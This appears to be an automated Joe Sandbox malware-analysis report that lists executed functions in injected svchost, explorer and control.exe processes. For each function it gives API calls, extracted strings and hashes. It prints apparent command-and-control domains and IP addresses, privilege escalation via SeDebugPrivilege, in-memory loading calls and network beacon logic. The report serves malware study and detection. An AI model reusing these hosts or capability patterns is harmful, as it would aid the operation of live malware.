Instruction ID: 38f0e9bbefa63ccdd8a9413268364dedc5adc2d29bec7fad42f4bd3d9d7804b7
Opcode Fuzzy Hash: 5aba02238f6d805f1ce277d98eda66def5532b63aa6b0690fc91dce229074048
Instruction Fuzzy Hash: 46615D70618E488FFB56EF68D49879DB7F1FB99300F500529E48BD32A2DB788544CB86

Function 000001AD8946B2EC Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 000001AD8946B309

Part of subcall function 000001AD89471348: _FindPESection.LIBCMT ref: 000001AD89471371

_initp_misc_cfltcvt_tab.LIBCMT ref: 000001AD8946B31A
_initterm_e.LIBCMT ref: 000001AD8946B32D
_IsNonwritableInCurrentImage.LIBCMT ref: 000001AD8946B376

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
String ID:
API String ID: 1991439119-0
Opcode ID: 52fa54e973aeb2b19a49adb6474171634653c8fc01917d0a0f6d6f57603e69a4
Instruction ID: 46c9b861451510dfa351461a488e0356708a83157c0d8491a19c6d21caabf34e
Opcode Fuzzy Hash: 52fa54e973aeb2b19a49adb6474171634653c8fc01917d0a0f6d6f57603e69a4
Instruction Fuzzy Hash: D411607131AE088AF756EB28FC857E672A0E796741F44452AD443C38E1EE3C898887C6

Function 00000001800023E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strstr.LIBCMT ref: 0000000180002471
strstr.LIBCMT ref: 0000000180002493

Strings

Internet Explorer, xrefs: 000000018000248C
Microsoft, xrefs: 000000018000246A

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: strstr
String ID: Internet Explorer$Microsoft
API String ID: 1392478783-2337349988
Opcode ID: 0c25899f695bc5a9acd01b9e17ef5bb873a41d5fd89ef3d92cb2c7e8141f0d52
Instruction ID: 7d8fdefae3fca78c7f01050cbf46e58ac24d422d8f8d4d2aba90c1e54b84fd3d
Opcode Fuzzy Hash: 0c25899f695bc5a9acd01b9e17ef5bb873a41d5fd89ef3d92cb2c7e8141f0d52
Instruction Fuzzy Hash: 8521B332215A8881FB92DB19E49039A7761F39D3E4F505321F6ED425EADF2DC68CCB00

Function 000001AD894728DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__crtIsPackagedApp.LIBCMT ref: 000001AD89472900
__crtIsPackagedApp.LIBCMT ref: 000001AD89472939

Strings

, xrefs: 000001AD8947296F

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: Packaged__crt
String ID:
API String ID: 2805518503-3916222277
Opcode ID: 70db6fc94174a6892a7a36fea4187ff861a667536073b8b7d02556fb5a49896d
Instruction ID: 1fcfe0bf7a114e5c555e7b5dcd95cc7a935aab386f8908e637e0488cc28da68b
Opcode Fuzzy Hash: 70db6fc94174a6892a7a36fea4187ff861a667536073b8b7d02556fb5a49896d
Instruction Fuzzy Hash: AD314F7061CB488FDB64EF1CE4857AAB7E0FB99711F14065EE489C3292EB74D900CB86

Analysis Process: explorer.exePID: 1028, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01220488 Relevance: 3.0, APIs: 2, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 012204B6
DeleteFileW.KERNEL32 ref: 012204BB

Memory Dump Source

Source File: 00000002.00000002.3293824549.0000000001220000.00000020.00000001.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1220000_explorer.jbxd

Similarity

API ID: DeleteFileSleep
String ID:
API String ID: 3161721237-0
Opcode ID: 8087837dc196c9fd9eb6c0fc42b97edb870f0ea81229feead1af620e7ad2ccc8
Instruction ID: e7e2e69932fd1ffb8e4346831cff6fcb66baafc2290cbd77b7ca6dc6004717cc
Opcode Fuzzy Hash: 8087837dc196c9fd9eb6c0fc42b97edb870f0ea81229feead1af620e7ad2ccc8
Instruction Fuzzy Hash: CBE06D2170CB1D4F9759AB6CBC9523C37D2C7D8231B00063BD249C22A6DD2585528285

Analysis Process: control.exePID: 2360, Parent PID: 6568COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.3%
Total number of Nodes:	1916
Total number of Limit Nodes:	27

Executed Functions

Function 1001D6D7 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 183
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 1001D70D
WSAGetLastError.WS2_32 ref: 1001D71B
htons.WS2_32(?), ref: 1001D736
htonl.WS2_32(00000000), ref: 1001D73F
htons.WS2_32(?), ref: 1001D753
setsockopt.WS2_32(?,0000FFFF,00000020,?), ref: 1001D77C
setsockopt.WS2_32(?,0000FFFF,00001005,?,00000004), ref: 1001D796
setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 1001D7A8
bind.WS2_32(?,?,00000010), ref: 1001D7B6

Strings

req, xrefs: 1001D7F6, 1001D7FB, 1001D803
res, xrefs: 1001D817, 1001D81C, 1001D82C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: setsockopt$htons$ErrorLastbindhtonlsocket
String ID: req$res
API String ID: 3993217638-3551752921
Opcode ID: 3d766b1c86af322e2b1c674f8abb068208c2ba73b05bfcc30b4838f339cebc76
Instruction ID: 1bc47685fa1208dc3a93f9195926757f6b3397a19b8973d8ec54e6f16cbb67a6
Opcode Fuzzy Hash: 3d766b1c86af322e2b1c674f8abb068208c2ba73b05bfcc30b4838f339cebc76
Instruction Fuzzy Hash: 9961A0B1408745AFE300EF64CC81AABBBECFF85354F40491AF69586190D771ED58CB92

Function 1001D145 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 175
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001D1C7
WSAGetLastError.WS2_32 ref: 1001D1D4
closesocket.WS2_32(000000FF), ref: 1001D367

Strings

cc1, xrefs: 1001D1E5
bck, xrefs: 1001D210, 1001D21C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLastclosesocketrecvfrom
String ID: bck$cc1
API String ID: 3381545151-2601045076
Opcode ID: 1afc6b33aa698e647960936aa7a38b170ccdc6ad95890d1043ae2c2f79c50c1a
Instruction ID: 74b77c914f8fb08b1b481ee05821763d154c8954b077fc1ebe75881fb8d60909
Opcode Fuzzy Hash: 1afc6b33aa698e647960936aa7a38b170ccdc6ad95890d1043ae2c2f79c50c1a
Instruction Fuzzy Hash: 5C51D372508341AFE710EF60CC81BABB7E8EF45354F404A1EFAA587191D771EA48CB52

Function 10006146 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165sleepthreadCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000614B
CreateThread.KERNEL32(00000000,00000000,1001D91A,?,00000000,00000000), ref: 100062EE

Part of subcall function 1001E124: TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
Part of subcall function 1001E124: CloseHandle.KERNEL32(?), ref: 1001E146
Part of subcall function 1001E124: CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159

Part of subcall function 1001DF0D: gethostname.WS2_32(?,00000100), ref: 1001DF22

__time64.LIBCMT ref: 100061B8

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Part of subcall function 10008C40: __EH_prolog.LIBCMT ref: 10008C45

Part of subcall function 1001E0D0: TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
Part of subcall function 1001E0D0: CloseHandle.KERNEL32(?), ref: 1001E0FE
Part of subcall function 1001E0D0: CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111

Sleep.KERNEL32(000003E8,?,?,?,?,00000000), ref: 100061DE
__time64.LIBCMT ref: 100061F4
Sleep.KERNELBASE(1005AFD4), ref: 10006224
__time64.LIBCMT ref: 1000622B

Strings

0.0.0.0, xrefs: 1000630F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Thread$Create__time64$CloseH_prologHandleSleepTerminateTime$FileSystem__aulldivgethostname
String ID: 0.0.0.0
API String ID: 1676007256-3771769585
Opcode ID: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
Instruction ID: edc6faf32b4ddbc48c22d14bf9bbfd6284b9bbf4270abf8aa5e2a7a96d60cd1e
Opcode Fuzzy Hash: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
Instruction Fuzzy Hash: 7651C2759006419FEB14DF74C888ADE77E6FF08384F248479E95ADB14BDB34A984CB60

Function 1001DFCB Relevance: 13.6, APIs: 9, Instructions: 69networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 1001DFE9
WSAGetLastError.WS2_32 ref: 1001DFF7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLastsocket
String ID:
API String ID: 1120909799-0
Opcode ID: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
Instruction ID: 715bde583ba2571ee879b219f8558a55a2540612a220d1531e37932013ff7162
Opcode Fuzzy Hash: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
Instruction Fuzzy Hash: 0D21B730640759BFE7219B648C8AFAEBBB8EF48B10F104225F715AA1E0D7F09985DB51

Function 100021EB Relevance: 10.6, APIs: 7, Instructions: 81memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209
GlobalAlloc.KERNEL32(00000040,00000001,?,?,00000001,10011CC0,?,?,00000000,00000001), ref: 10002221
GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002236
inet_addr.WS2_32(000001B0), ref: 1000225D
inet_addr.WS2_32(000001D8), ref: 1000228F
SendARP.IPHLPAPI(00000000,00000000,00000000,?), ref: 100022A5
GlobalFree.KERNEL32(00000000), ref: 100022B7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AdaptersGlobalInfoinet_addr$AllocFreeSend
String ID:
API String ID: 3182797412-0
Opcode ID: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
Instruction ID: 66c9d7adb0e976905d06d262638f06281183517b136eb4124925cbb498e8f50e
Opcode Fuzzy Hash: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
Instruction Fuzzy Hash: 38214175900616BBEB01DBF4CC48AAEBBF8FF05394F114156E905D3254E730DA41CBA0

Function 1001C2A5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F

Strings

SeDebugPrivilege, xrefs: 1001C2CA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 3038321057-2896544425
Opcode ID: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
Instruction ID: 79d661b54e262ca987bee1b9e957b190e0284badbbec8ecc12dccea534644da2
Opcode Fuzzy Hash: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
Instruction Fuzzy Hash: 2301A871A00229ABEB10DFA5CC59EEFBFBCEF04744F444055E515E6190E7709A44DBA1

Function 00B1023D Relevance: 4.9, APIs: 3, Instructions: 444memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 00B10487
LoadLibraryA.KERNELBASE(?), ref: 00B10574
VirtualProtect.KERNELBASE(?,?,?,?), ref: 00B1072B

Memory Dump Source

Source File: 00000003.00000003.2037787029.0000000000B10000.00000020.00000400.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_b10000_control.jbxd

Yara matches

Similarity

API ID: Virtual$AllocLibraryLoadProtect
String ID:
API String ID: 1403325721-0
Opcode ID: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
Instruction ID: 7651bd41564716c4a7cf3f7b71bda43f624433c465c608722b19d56fe0899a2a
Opcode Fuzzy Hash: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
Instruction Fuzzy Hash: BB0239706183019FC715DF19C490A6ABBE5FF98714F4589ADE8899B391D7B0EC80CF92

Function 10005BE6 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 320
synchronizationnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 10005C19
CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 10005CB7
_sprintf.LIBCMT ref: 10005D14
CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,?), ref: 10005D90
_sprintf.LIBCMT ref: 10005DE0

Strings

wktcp.61611.live, xrefs: 1000602E
wktc, xrefs: 10005F7C
5566, xrefs: 10005FC6
api.5566331.com, xrefs: 1000604E
agi.vh748yy.com, xrefs: 10005E9C
api., xrefs: 10005FFA
com, xrefs: 10006018
p.61, xrefs: 10005F87
a2b.sh3y.com, xrefs: 10005D02
c1werjkdi%42&!#456, xrefs: 10005D19
live, xrefs: 10005F9D
%s%s, xrefs: 10005D0E, 10005DDA, 10005EA8
331., xrefs: 10005FD1
c1werjkdi%42&!#789, xrefs: 10005DE5
5566, xrefs: 10006002
611., xrefs: 10005F92
api., xrefs: 10005FBB
c1werjkdi%42&!#012, xrefs: 10005EB3
api.5566331.com, xrefs: 1000603E
tki.bb5483b.com, xrefs: 10005DCE
331., xrefs: 1000600D
com, xrefs: 10005FDC

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CreateMutex_sprintf$Startup
String ID: %s%s$331.$331.$5566$5566$611.$a2b.sh3y.com$agi.vh748yy.com$api.$api.$api.5566331.com$api.5566331.com$c1werjkdi%42&!#012$c1werjkdi%42&!#456$c1werjkdi%42&!#789$com$com$live$p.61$tki.bb5483b.com$wktc$wktcp.61611.live
API String ID: 2582006962-90602932
Opcode ID: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
Instruction ID: 58b0ecb6076ab785b7a927ea96f25bffcb0b9f035f233e99f1965f63245a51b2
Opcode Fuzzy Hash: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
Instruction Fuzzy Hash: C5D17FB440C780AEE325DF60CC81FEBB7E8EB95344F44492DF19D46182DB75A549CBA2

Function 1004BAAE Relevance: 46.1, APIs: 25, Strings: 1, Instructions: 615fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 1004BCF9
___createFile.LIBCMT ref: 1004BD3A
GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD63
__dosmaperr.LIBCMT ref: 1004BD6A
GetFileType.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD7D
GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDA0
__dosmaperr.LIBCMT ref: 1004BDA9
CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDB2
__set_osfhnd.LIBCMT ref: 1004BDE2
__lseeki64_nolock.LIBCMT ref: 1004BE4C
__close_nolock.LIBCMT ref: 1004BE72
__chsize_nolock.LIBCMT ref: 1004BEA2
__lseeki64_nolock.LIBCMT ref: 1004BEB4
__lseeki64_nolock.LIBCMT ref: 1004BFAC
__lseeki64_nolock.LIBCMT ref: 1004BFC1
__close_nolock.LIBCMT ref: 1004C021

Part of subcall function 100411E8: CloseHandle.KERNEL32(00000000,1000DD8F,00000000,?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041238
Part of subcall function 100411E8: GetLastError.KERNEL32(?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041242
Part of subcall function 100411E8: __free_osfhnd.LIBCMT ref: 1004124F
Part of subcall function 100411E8: __dosmaperr.LIBCMT ref: 10041271

Part of subcall function 10037F1F: __getptd_noexit.LIBCMT ref: 10037F1F

__lseeki64_nolock.LIBCMT ref: 1004C043
CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C178
___createFile.LIBCMT ref: 1004C197
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C1A4
__dosmaperr.LIBCMT ref: 1004C1AB
__free_osfhnd.LIBCMT ref: 1004C1CB
__invoke_watson.LIBCMT ref: 1004C1F9

Strings

@, xrefs: 1004BDCE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd
String ID: @
API String ID: 710831883-2766056989
Opcode ID: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
Instruction ID: 4bc8964a9d16cae8c67520329504f5e8b6c1dd015f7f366feaadc10eed736cac
Opcode Fuzzy Hash: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
Instruction Fuzzy Hash: 5A220471D00A0A9FEB55CF68CC91BAD7BA1EB04390F344279E911EB2E2C7759D40C799

Function 1001A36C Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 206
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 1001A3C7
socket.WS2_32(00000002,00000001,00000000), ref: 1001A3E0
WSAGetLastError.WS2_32 ref: 1001A3F0
setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001A426
inet_ntoa.WS2_32(?), ref: 1001A434
_wprintf.LIBCMT ref: 1001A466
connect.WS2_32(?,?,00000010), ref: 1001A4AA
inet_addr.WS2_32(114.114.114.114), ref: 1001A51E

Part of subcall function 10016D1B: __EH_prolog.LIBCMT ref: 10016D20
Part of subcall function 10016D1B: _sprintf.LIBCMT ref: 10016D94

inet_addr.WS2_32 ref: 1001A570
inet_addr.WS2_32(47.76.212.112), ref: 1001A5A9
inet_addr.WS2_32(47.76.187.31), ref: 1001A5C1
inet_addr.WS2_32(47.76.24.248), ref: 1001A5D9

Strings

connect ip:%s , xrefs: 1001A493
inc\http\Socket.cpp, xrefs: 1001A452
Error (%s) in line: %d in file: %s, xrefs: 1001A461
47.76.212.112, xrefs: 1001A5A4
114.114.114.114, xrefs: 1001A519
47.76.187.31, xrefs: 1001A5BC
47.76.24.248, xrefs: 1001A5D4
value.length() > 0, xrefs: 1001A45C
DNSLookup result (%s):, xrefs: 1001A55A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: inet_addr$ErrorH_prologLast_sprintf_wprintfconnecthtonsinet_ntoasetsockoptsocket
String ID: 114.114.114.114$47.76.187.31$47.76.212.112$47.76.24.248$DNSLookup result (%s):$Error (%s) in line: %d in file: %s$connect ip:%s $inc\http\Socket.cpp$value.length() > 0
API String ID: 1519317838-3972532071
Opcode ID: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
Instruction ID: 7b49e0120e11b4ab11456f49e9eb18eb1437e29c51d74eb201d297852d276499
Opcode Fuzzy Hash: d7dae1ff96ce2e9e4ab841948fc23fca1489f10708eb42359bd744715b7b5237
